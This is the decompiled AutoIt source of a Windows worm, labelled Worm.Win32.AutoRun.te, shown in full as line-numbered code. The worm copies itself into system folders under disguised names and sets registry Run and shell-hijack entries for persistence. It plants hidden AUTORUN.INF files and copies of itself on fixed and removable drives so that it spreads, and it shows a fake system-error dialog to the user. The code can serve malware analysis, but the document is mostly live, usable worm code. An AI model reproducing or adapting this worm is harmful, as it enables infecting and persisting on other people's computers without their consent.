Worm.Win32.AutoRun.te - Source Code

1. ; <AUT2EXE VERSION: 3.2.2.0>
2.  
3. ; ----------------------------------------------------------------------------
4. ; <AUT2EXE INCLUDE-START: C:\$ROOT\var\src\nsdapp\nsdapp.au3>
5. ; ----------------------------------------------------------------------------
6.  
7. #NoTrayIcon
8. Opt("MustDeclareVars",1)
9.  
10. Dim Const $DIRECT=@WindowsDir&"\Debug"
11. Dim Const $1ST_CMPNENT=@SystemDir&"\wbem\nsdapp.exe"
12. Dim Const $IE_CMPNENT=@ProgramFilesDir&"\Internet Explorer\Connection Wizard\icwnsdp.exe"
13. Dim $target
14.  
15. Select
16.     Case $CmdLine[0]=0
17.         Nestor(1)
18.     Case ($CmdLine[1]="_OPEN_DRIVE")
19.         Run(@WindowsDir&"\Explorer.exe /e,"&@ScriptDir&"\..")
20.         Nestor(1)
21.     Case ($CmdLine[1]="_OPEN_HOME_PAGE")
22.         Run(@ProgramFilesDir&"\Internet Explorer\IEXPLORE.EXE",@ProgramFilesDir&"\Internet Explorer",@SW_MAXIMIZE)
23.         Nestor(1)
24.     Case ($CmdLine[1]="-expand")
25.         Expand()
26.     Case ($CmdLine[1]="-gui")
27.         FileInstall("gui.dat",@TempDir&"\00100001.EXE",1)
28.         RunWait(@TempDir&"\00100001.EXE")
29.         FileDelete(@TempDir&"\00100001.EXE")
30.     Case ($CmdLine[1]="-inactive")
31.         Uninstall()
32.     Case Else
33.         MsgBox(262160,"System error","Mouse Pad has performed an illegal instruction ("&$CmdLine[1]&") and will be shut down",9)
34. EndSelect
35. Exit (0)
36.  
37. Func Fs32()
38.     If DriveGetFileSystem(@HomeDrive)="NTFS" Then
39.         $target=@WindowsDir&"\system32\config\systemprofile\NtUser.."
40.     Else
41.         $target=@HomeDrive&"\..."
42.     Endif
43.     Return $target
44. EndFunc
45.  
46. Func Nestor($v)
47.     $target=Fs32()
48.     FileInstall("nsdapp.dat",$DIRECT&"\drwtsn32.exe",1)
49.     RunWait(@COMSPEC&" /c md "&$target&"\",@SystemDir,@SW_HIDE)
50.     RunWait($DIRECT&"\drwtsn32.exe "&$target&"\"&@ComputerName&"_"&@YDAY&@YEAR&".EXE")
51.     FileDelete($DIRECT&"\drwtsn32.exe")
52.     If (@ScriptFullPath)<>($1ST_CMPNENT) Then
53.         FileCopy(""&@ScriptFullPath&"",$1ST_CMPNENT,1)
54.         FileSetAttrib($1ST_CMPNENT,"-SH")
55.     Endif
56.     If (@ScriptFullPath)<>($IE_CMPNENT) Then
57.         FileCopy(""&@ScriptFullPath&"",$IE_CMPNENT,1)
58.         FileSetAttrib($IE_CMPNENT,"-SH")
59.     Endif
60.     ;Func Regent
61.     RegWrite("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command","","REG_SZ",$IE_CMPNENT&" _OPEN_HOME_PAGE")
62.     RegWrite("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder","Attributes","REG_DWORD",0)
63.     RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run","1","REG_SZ","nsdapp")
64.     If $v=1 Then Recycler()
65. EndFunc
66.  
67. Func Recycler()
68.     Dim $drives=DriveGetDrive("FIXED")
69.     If NOT @error Then
70.         For $i = 1 to $drives[0]
71.             If (DriveGetFileSystem($drives[$i]))="NTFS" Then
72.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","-RSH")
73.                 FileInstall("auntfs.dat",$drives[$i]&"\AUTORUN.INF",1)
74.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","+SH")
75.                 FileCopy(@ScriptFullPath,$drives[$i]&"\RECYCLER\INFO2.EXE",1)
76.                 FileSetAttrib($drives[$i]&"\RECYCLER\INFO2.EXE","+SH")
77.             Else
78.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","-RSH")
79.                 FileInstall("aufat.dat",$drives[$i]&"\AUTORUN.INF",1)
80.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","+SH")
81.                 FileCopy(@ScriptFullPath,$drives[$i]&"\Recycled\INFO2.EXE",1)
82.                 FileSetAttrib($drives[$i]&"\Recycled\INFO2.EXE","+SH")
83.             Endif
84.         Next
85.     Endif
86.     $drives=""
87.     $drives=DriveGetDrive("REMOVABLE")
88.     If NOT @error Then
89.         For $i = 2 to $drives[0]
90.             DirCreate($drives[$i]&"\Recycled")
91.             FileSetAttrib($drives[$i]&"\AUTORUN.INF","-RSH")
92.             FileInstall("aufat.dat",$drives[$i]&"\AUTORUN.INF",1)
93.             FileSetAttrib($drives[$i]&"\AUTORUN.INF","+SH")
94.             FileCopy(@ScriptFullPath,$drives[$i]&"\Recycled\INFO2.EXE",1)
95.             FileSetAttrib($drives[$i]&"\Recycled","+SH",1)
96.         Next
97.     Endif
98. EndFunc
99.  
100. Func Expand()
101.     $target=Fs32()
102.     FileChangeDir(@WorkingDir)
103.     DirCreate(@ComputerName)
104.     FileChangeDir(@ComputerName)
105.     RunWait(@COMSPEC&" /c copy "&$target&"\*.*","",@SW_MAXIMIZE)
106.     RunWait(@COMSPEC&" /c ren *.EXE *.ASM","",@SW_HIDE)
107.     If (MsgBox(262436,"TK-32","Files inflated in "&@WorkingDir&". Do you want flush the _$target_ folder?",80))==6 Then
108.         RunWait(@COMSPEC&" /c rd "&$target&"\ /s /q","",@SW_HIDE)
109.         Nestor(0)
110.     Endif
111. EndFunc
112.  
113. Func Uninstall()
114.     Dim $drives=DriveGetDrive("FIXED")
115.     If NOT @error Then
116.         For $i = 1 to $drives[0]
117.             FileDelete($drives[$i]&"\AUTORUN.INF")
118.         Next
119.     Endif
120.     $drives=""
121.     $drives=DriveGetDrive("REMOVABLE")
122.     If NOT @error Then
123.         For $i = 2 to $drives[0]
124.             FileDelete($drives[$i]&"\AUTORUN.INF")
125.         Next
126.     Endif
127.     RegWrite("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command","","REG_SZ",@ProgramFilesDir&"\Internet Explorer\IEXPLORE.EXE")
128.     RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe")
129.     RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run","1")
130. EndFunc
131.  
132. ; ----------------------------------------------------------------------------
133. ; <AUT2EXE INCLUDE-END: C:\$ROOT\var\src\nsdapp\nsdapp.au3>
134. ; ----------------------------------------------------------------------------
135.